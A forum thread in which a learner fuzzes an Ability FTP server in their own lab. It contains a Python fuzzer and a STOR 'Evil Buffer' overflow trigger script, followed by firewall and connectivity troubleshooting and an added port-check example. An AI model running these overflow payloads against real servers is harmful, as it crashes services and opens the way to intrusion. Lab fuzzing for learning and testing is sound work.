LinuxQuestions.org


lee_can 05-29-2011 01:39 PM

Fuzzing - Buffer Overflow - Ability Server - Could not Connect to FTP Server
 
Hi,
I am trying to send malformed strings to the Ability FTP server in order to cause some unexpected crashes.

I log in to the Ability FTP server on my Windows 7 machine.
On my virtual machine, I am working on BackTrack 4. I tried to send some strings to cause some unexpected crashes, but I couldn't succeed.
Here is the code:

PHP Code:

#!/usr/bin/python
import socket

# Create an array of buffers, from 20 to 2000, with increments of 20.
buffer=["A"]
counter=20
while len(buffer) <= 100:
        buffer.append("A"*counter)
        counter=counter+20

# Define the FTP commands to be fuzzed
commands=["MKD","CWD","STOR"]

# Run the fuzzing loop
for command in commands:
        for string in buffer:
                print "Fuzzing" + command + ":" +str(len(string))
                s=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
                connect=s.connect(('192.168.8.23',21))
                s.recv(1024)                          # read the server greeting
                s.send('USER USER_TEST\r\n')          # FTP syntax is "USER <name>"
                s.recv(1024)
                s.send('PASS 12345\r\n')              # FTP syntax is "PASS <password>"
                s.recv(1024)
                s.send(command + ' ' + string + '\r\n')
                s.recv(1024)
                s.send('QUIT\r\n')
                s.close()

I just want to log in to the FTP server, with username "USER_TEST" and pass "12345", on my Windows 7 machine (IP 192.168.8.23), but it gave me this:
Quote:

root@bt:~/Files/Script/bufferflow# ./simple-fuzzer.py
FuzzingMKD:1
Traceback (most recent call last):
File "./simple-fuzzer.py", line 19, in <module>
connect=s.connect(('192.168.8.23',21))
File "<string>", line 1, in connect
socket.error: (110, 'Connection timed out')
Can anyone advise please?
Regards

kbp 05-29-2011 05:51 PM

Is there some reason you can't use ftplib rather than manually set up a socket/connection ? .. at least test it with ftplib first to make sure it works.

lee_can 05-29-2011 09:59 PM

Quote:

Originally Posted by kbp (Post 4370475)
Is there some reason you can't use ftplib rather than manually set up a socket/connection ? .. at least test it with ftplib first to make sure it works.

Hi kbp,
ftplib didn't work for me either; it gave me "cannot connect to server". When I go back home, I will show the script.

Regards

kbp 05-30-2011 06:29 AM

Then maybe it's a connection/firewall problem, please check basic connectivity (ping) and ensure any firewalls are allowing ftp traffic. It's easiest to turn them off considering this is just a test host.

lee_can 05-30-2011 12:02 PM

Quote:

Originally Posted by kbp (Post 4370475)
Is there some reason you can't use ftplib rather than manually set up a socket/connection ? .. at least test it with ftplib first to make sure it works.

I appreciate your help, kbp.
Regarding ftplib, I tried a script from this website.
Here is the script:
PHP Code:

import ftplib
from ftplib import FTP

buffer = '\x41'*1600
try:
   # Edit the IP, Username and Password.
   ftp = FTP('192.168.8.23')
   ftp.login('USER_TEST','12345')
   print "\nEvil Buffer sent..."
except:
   print "\nCould not Connect to FTP Server."
try:
   ftp.transfercmd("STOR " + buffer)
except:
   print "\nDone."

So, when I tried to run this script, I got this error:
Code:

root@bt: ./test.py
./test.py: line 4: buffer: command not found
./test.py: line 5: try:: command not found
./test.py: line 7: syntax error near unexpected token `('
./test.py: line 7: `  ftp = FTP('192.168.8.23') '

I am still new to this Linux system.
Thanks in advance for your help.

kbp 05-31-2011 05:32 PM

You'll need to tell the OS which interpreter to execute the script with, please add :-

Code:

#!/usr/bin/env python
as the first line in your script

lee_can 06-01-2011 11:56 AM

Quote:

Originally Posted by kbp (Post 4372418)
You'll need to tell the OS which interpreter to execute the script with, please add :-

Code:

#!/usr/bin/env python
as the first line in your script

Thanks kbp for your help. Well, I added the above line, but I still cannot connect:

root@bt:~/Files/Script/bufferflow# ./test.py

Could not Connect to FTP Server.

Done.

I don't know why.

kbp 06-01-2011 05:48 PM

So you still have a connection problem ... let's start at the start, please run these tests in order and post the results:-

From the linux machine:
- ping 192.168.8.23
- telnet 192.168.8.23 21

From the Windows machine:
- ping <ip_of_linux_machine>
- netstat -a -p tcp | findstr 21

lee_can 06-02-2011 11:12 AM

Hi kbp,
please find below the output:
Code:

root@bt:~# ping 192.168.8.23
PING 192.168.8.23 (192.168.8.23) 56(84) bytes of data.
64 bytes from 192.168.8.23: icmp_seq=1 ttl=128 time=0.825 ms
64 bytes from 192.168.8.23: icmp_seq=2 ttl=128 time=1.50 ms
64 bytes from 192.168.8.23: icmp_seq=3 ttl=128 time=5.39 ms
64 bytes from 192.168.8.23: icmp_seq=4 ttl=128 time=0.456 ms
^Z
[2]+  Stopped                ping 192.168.8.23
root@bt:~#

Code:

root@bt:~# telnet 192.168.8.23 21
Trying 192.168.8.23...
telnet: Unable to connect to remote host: Connection timed out
root@bt:~#

Code:

Microsoft Windows [Version 6.1.7600]
Copyright (c) 2009 Microsoft Corporation.  All rights reserved.

C:\Users\W1>ping 192.168.8.36

Pinging 192.168.8.36 with 32 bytes of data:
Reply from 192.168.8.36: bytes=32 time<1ms TTL=64
Reply from 192.168.8.36: bytes=32 time<1ms TTL=64
Reply from 192.168.8.36: bytes=32 time<1ms TTL=64
Reply from 192.168.8.36: bytes=32 time<1ms TTL=64

Ping statistics for 192.168.8.36:
    Packets: Sent = 4, Received = 4, Lost = 0 (0% loss),
Approximate round trip times in milli-seconds:
    Minimum = 0ms, Maximum = 0ms, Average = 0ms

Code:

C:\Users\W1>netstat -a -p tcp | findstr 21
  TCP    0.0.0.0:21            W1-PC:0                LISTENING

C:\Users\W1>

I really appreciate your help.
Regards

kbp 06-02-2011 08:35 PM

It's probably the Windows Firewall .. do you need help to modify it ?

lee_can 06-02-2011 09:58 PM

Quote:

Originally Posted by kbp (Post 4374634)
It's probably the Windows Firewall .. do you need help to modify it ?

If you don't mind, as I am still a newbie in this world and trying to learn.

kbp 06-03-2011 08:41 AM

In the "Control Panel" you'll find "Windows Firewall" - open it. There should be checkboxes that say "notify me when windows firewall blocks a new program" - ensure they're checked and the "block all incoming connections .. " ones are not.

The next time you attempt to connect to the ftp server a message should appear asking if you want to allow the access - say yes.

lee_can 06-03-2011 12:39 PM

Quote:

Originally Posted by kbp (Post 4375106)
In the "Control Panel" you'll find "Windows Firewall" - open it. There should be checkboxes that say "notify me when windows firewall blocks a new program" - ensure they're checked and the "block all incoming connections .. " ones are not.

The next time you attempt to connect to the ftp server a message should appear asking if you want to allow the access - say yes.

I don't know how to thank you kbp, really, thank you very much.
Everything is fine now, I can continue now ...
Best regards
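
Added example, not part of any post in this thread: a Python 3 pre-flight check that separates the three outcomes the diagnosis above relied on (connect times out, connect is refused, or the server answers with its 220 greeting), so a test script can report why it cannot reach the FTP port. The script name, state names and hint texts are assumptions made for this example.

```python
#!/usr/bin/env python3
"""Pre-flight check for an FTP control port (added example, Python 3)."""
import socket
import sys

# What each outcome means, following the diagnosis in this thread.
HINTS = {
    "open": "TCP connect works and the server sent its 220 greeting.",
    "open-no-greeting": "TCP connect works but no 220 greeting arrived; "
                        "is this really the FTP service?",
    "refused": "Host answered with a reset: nothing is listening on the port.",
    "filtered": "No answer to the connect attempt: if ping works, a firewall "
                "is dropping the connection (the case in this thread).",
    "error": "Other network error, e.g. no route to the host.",
}

def classify(exc):
    """Map a failed connect() to one of the HINTS keys."""
    if isinstance(exc, ConnectionRefusedError):
        return "refused"
    if isinstance(exc, (socket.timeout, TimeoutError)):
        return "filtered"
    return "error"

def probe(host, port=21, timeout=3.0):
    """Return (state, greeting) for one TCP connection attempt."""
    try:
        conn = socket.create_connection((host, port), timeout=timeout)
    except OSError as exc:
        return classify(exc), None
    with conn:
        try:
            greeting = conn.recv(1024).decode("ascii", "replace").strip()
        except OSError:
            greeting = ""
    if greeting.startswith("220"):
        return "open", greeting
    return "open-no-greeting", greeting or None

if __name__ == "__main__":
    # Usage: ./ftp_preflight.py 192.168.8.23   (script name is hypothetical)
    target = sys.argv[1] if len(sys.argv) > 1 else "127.0.0.1"
    state, greeting = probe(target)
    print("%s:21 -> %s: %s" % (target, state, HINTS[state]))
    if greeting:
        print("greeting:", greeting)
```

A "filtered" result together with a working ping and a LISTENING entry in netstat on the server is the combination seen in this thread.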


All times are GMT -5.